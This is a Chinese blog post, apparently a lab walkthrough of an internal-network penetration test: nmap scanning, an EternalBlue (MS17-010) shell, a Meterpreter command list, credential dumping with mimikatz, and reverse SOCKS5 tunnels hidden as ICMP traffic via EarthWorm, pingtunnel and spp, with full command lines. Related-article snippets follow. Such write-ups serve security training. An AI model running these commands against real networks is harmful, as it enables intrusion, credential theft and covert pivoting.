内网渗透过程

最新推荐文章于 2024-04-14 16:19:51 发布
最新推荐文章于 2024-04-14 16:19:51 发布
阅读量88 收藏
点赞数
文章标签: 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_21383109/article/details/133861248
版权

一、信息搜集

1、使用nmap进行网段扫描

2、使用nmap扫端口

发现139、445、3389端口均处于开放状态,其中IP为172.26.0.152主机的7001(Weblogic)端口处于开启

3、使用Weblogic Scan扫描漏洞

二、漏洞利用get shell

1、尝试利用扫出来的漏洞,发现无法成功get shell,使用永恒之蓝试试看

成功利用ms17-010(永恒之蓝)get shell

Meterpreter基本命令

sessions  # 列出后台会话
sessions -i <ID值>  #进入指定会话   
sessions -k  #杀死指定会话
background  #将当前会话放置后台
run  #执行已有的模块,输入run后按两下tab,列出已有的脚本
info #查看已有模块信息
getuid # 查看权限
getpid # 获取当前进程的pid
sysinfo # 查看目标机系统详细信息
ps # 查看当前活跃进程

kill <PID值> #杀死进程
idletime #查看目标机闲置时间
reboot(linux) / shutdown(windows)   #重启/关机
shell #进入目标机cmd

2、将mimikatz上传到web主机

3、使用mimikatz查看系统密码

成功得到内网的账号和密码

三、内网隧道搭建

1、ew+pingtunnel组合建立socks5隧道

ew

EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。

pingtunnel

pingtunnel 是把 tcp/udp/sock5 流量伪装成 icmp 流量进行转发的工具

2、Kali执行ew与pingtunnel

./ew_for_linux64 -s rcsocks -l 10080 -e 8898

./pingtunnel -type server

 

3、WEB服务器执行pingtunnel与ew

pingtunnel.exe -type client -l 127.0.0.1:9999 -s 172.26.0.128 -t 172.26.0.128:8898 -sock5 -1 -noprint 1 -nolog 1

​
ew.exe -s rssocks -d 127.0.0.1 -e 9999
​

ew回显OK,隧道已打通!

4、连接代理

使用proxifier设置代理

四、其他方式搭建隧道(spp搭建socks5隧道)

支持的协议:tcp、udp、rudp(可靠udp)、ricmp(可靠icmp)、rhttp(可靠http)、kcp、quic
支持的类型:正向代理、反向代理、socks5正向代理、socks5反向代理
协议和类型可以自由组合
外部代理协议和内部转发协议可以自由组合
支持shadowsock/s插件,spp-shadowsock/s-plugin,spp-shadowsock/s-plugin-android

1、Kali执行

./spp -type server -proto ricmp -listen 0.0.0.0

2、WEB服务器执行

spp.exe -name "test" -type reverse_socks5_client -server 172.26.0.128 -fromaddr :8080 -proxyproto tcp -proto ricmp

查看Kali spp回显

成功搭建隧道

@Kid
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透流程与思路和工具讲解
04-10
内网渗透流程与思路和工具讲解
小白必看!渗透测试的8个步骤
m0_59236127的博客
03-03 7291
渗透测试:以安全为基本原则,通过攻击者以及防御者的角度去分析目标所存在的安全隐患以及脆弱性,以保护系统安全为最终目标。入侵:通过各种方法,甚至破坏性的操作,来获取系统权限以及各种敏感信息。l 确定范围:测试目标的范围、ip、域名、内外网、测试账户。l 确定规则:能渗透到什么程度,所需要的时间、能否修改上传、能否提权、等等。l 确定需求:web应用的漏洞、业务逻辑漏洞、人员权限管理漏洞、等等。l 方式:主动扫描,开放搜索等。l 开放搜索:利用搜索引擎获得:后台、未授权页面、敏感url、等等。l 基础信息:IP
内网渗透步骤
weixin_42583683的博客
01-01 954
内网渗透步骤包括以下几个步骤: 信息收集:收集有关目标网络的信息,包括 IP 地址范围、操作系统、网络拓扑结构、开放端口和服务等。 漏洞分析:分析目标网络中存在的漏洞,并找出可以利用的漏洞进行攻击。 攻击尝试:尝试利用找到的漏洞进行攻击,获取对目标网络的访问权限。 权限提升:在获得访问权限后,尝试通过各种手段提升自己在目标网络中的权限。 持久化访问:确保在目标网络中的访问权限能够持久保留...
内网渗透-实战|手把手教你如何进行内网渗透
最新发布
lza20001103的博客
04-14 1548
内网渗透-实战|手把手教你如何进行内网渗透
渗透测试的一般流程过程
dzqxwzoe的博客
03-02 1394
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。不过我们这个水平也就算个渗透测试工程师,也就只能做个基础的安全服务,而这个领域还有很多业务,像攻防演练、等保测评、风险评估等,我们的能力根本不够看。rookit,后门,添加管理账号,驻扎手法等。
内网安全之:内网渗透流程
f_carey的博客
09-12 9990
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 内网渗透流程1 前提2 实验环境2.1 建立 meterpreter 反向连接2.2 收集信息提升权限2.3 持久后门: 添加隐藏用户2.4 添加内网路由2.5 扫描内网存活主机2.6 扫描内网主机开放的端口2.6.1 使用 SOCKS 后nmap 扫描报错2.7 攻击内网主机 1 前提 利用已经控制的一台计.
手把手教你如何进行内网渗透
热门推荐
iO快到碗里来
11-19 8万+
0x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。 0x01 信息收集 systeminfo 查看系统详细信息,如OS版本、补丁安装情况,可以根据这些信息筛选可利用的漏洞。 net start 查看启动进
渗透测试之内网渗透学习,超详细
z099164的博客
07-04 3395
渗透测试之内网渗透学习,超详细
一次完整的渗透测试流程
HIM_MRY的博客
08-30 6280
渗透测试 渗透测试就是利用我们所掌握的渗透知识,对网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一篇测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站进行漏洞修补,以防止黑客的入侵! 渗透测试的前提是我们得经过用户的授权,才可以对网站进行渗透。如果我们没有经过客户的授权而对一个网站进行渗透测试的话,这是违法的。去年的6.1日我国颁布了《网络安全法》,对网络犯罪有了法律约束,不懂的移步——> 网络安全法 渗透测试分为白盒测试和黑盒测试 1.白盒测试就...
小白入门黑客之渗透测试基本流程(全网最详,附工具)
瓦罗兰特顶级C位的博客
06-09 3216
渗透测试其实就是通过一些手段来找到网站,APP,网络服务,软件,服务器等网络设备和应用的漏洞,告诉管理员有哪些漏洞,怎么填补,从而防止黑客的入侵。
内网渗透讲义(1).pdf
06-30
在渗透测试过程中,我们经常会遇到以下场景:某处于域中的服务器通过路由做端口映射,对外提供web服务,我们通过web脚本漏洞获得了该主机的system权限,如果甲方有进一步的内网渗透测试需求,以证明企业所面临的巨大...
内网渗透之常见命令
03-14
内网渗透之常见命令,详细列数了渗透的过程中所用到的所有技术,命令
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
记录一次国外某内网的实战过程.pdf
11-25
WEB安全、内网渗透
网络安全——内网渗透完整流程
xnxqwzy的博客
12-25 1127
因为主要还是想练习练习内网,所以用了最简单粗暴的方法去找寻找目标,利用fofa来批量了一波weblogic,不出一会便找到了目标。简单的看了下机器环境,出网,没有杀软(后面发现实际是有一个很小众的防火墙的,但是不拦powershell),有内网环境。所以这里直接尝试cs自带的Scripted Web Delivery模块,直接创建一个web服务用于一键下载和执行powershell。运行刚刚生成的powershell这边的CS成功上线。
内网渗透知识基础及流程
bylfsj的博客
02-28 6089
  前言 现在网上内网渗透、域渗透文章很多,大多数人只知道如何进行操作获取全新,不知使用该技术的原理和该技术操作影响Windows何种功能,Windows何种机制对内网渗透产生的影响。本文按照数个Windows系统的功能进行讲解,完善内网渗透知识结构。   要点 SAM Hash Active Directory Kerberos SMB IPC NetBIOS LLM...
实战|手把手教你如何进行内网渗透
ytt0523_com的博客
12-08 1081
内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。
内网渗透 | 手把手教你如何进行内网渗透
mingyqf的博客
07-01 2644
发布于2020-02-17 16:42:26阅读 4K0目录结构[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Iz2F7mzJ-1656677584270)(https://ask.qcloudimg.com/http-save/yehe-5957324/0v0eirg7bb.png?imageView2/2/w/1620)]首页看到DMZ开启了web服务,是一个typecho的cms,后台默认就是/admin后台尝试爆破弱口令admin1234但是找了一圈并没有发现有什么可
一个完整的内网渗透是什么样子的
kali_Ma的博客
08-12 3849
0x00 前言 今天这篇文章将试图呈现一个完整的内网渗透过程。文章略长,如果感兴趣的话,请耐心阅读! 0x01 案例分析 实验环境: 目标环境:10.0.0.0/24, 10.0.1.0/24 攻击主机:10.0.0.5 (Kali), 10.0.0.7 (Windows) 渗透过程: 基本的主机探测: root@kali:~# nmap -sn 10.0.0.0/24 -oG online.txt root@kali:~# cat online.txt | grep -i up Host:
python内网渗透
10-24
Python内网渗透是指利用Python编写的工具和脚本,通过漏洞利用、端口扫描、密码爆破等方式,获取内网中的敏感信息或者控制内网主机的过程。常用的Python内网渗透工具有reGeorgSocksProxy、ABPTTS等。其中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值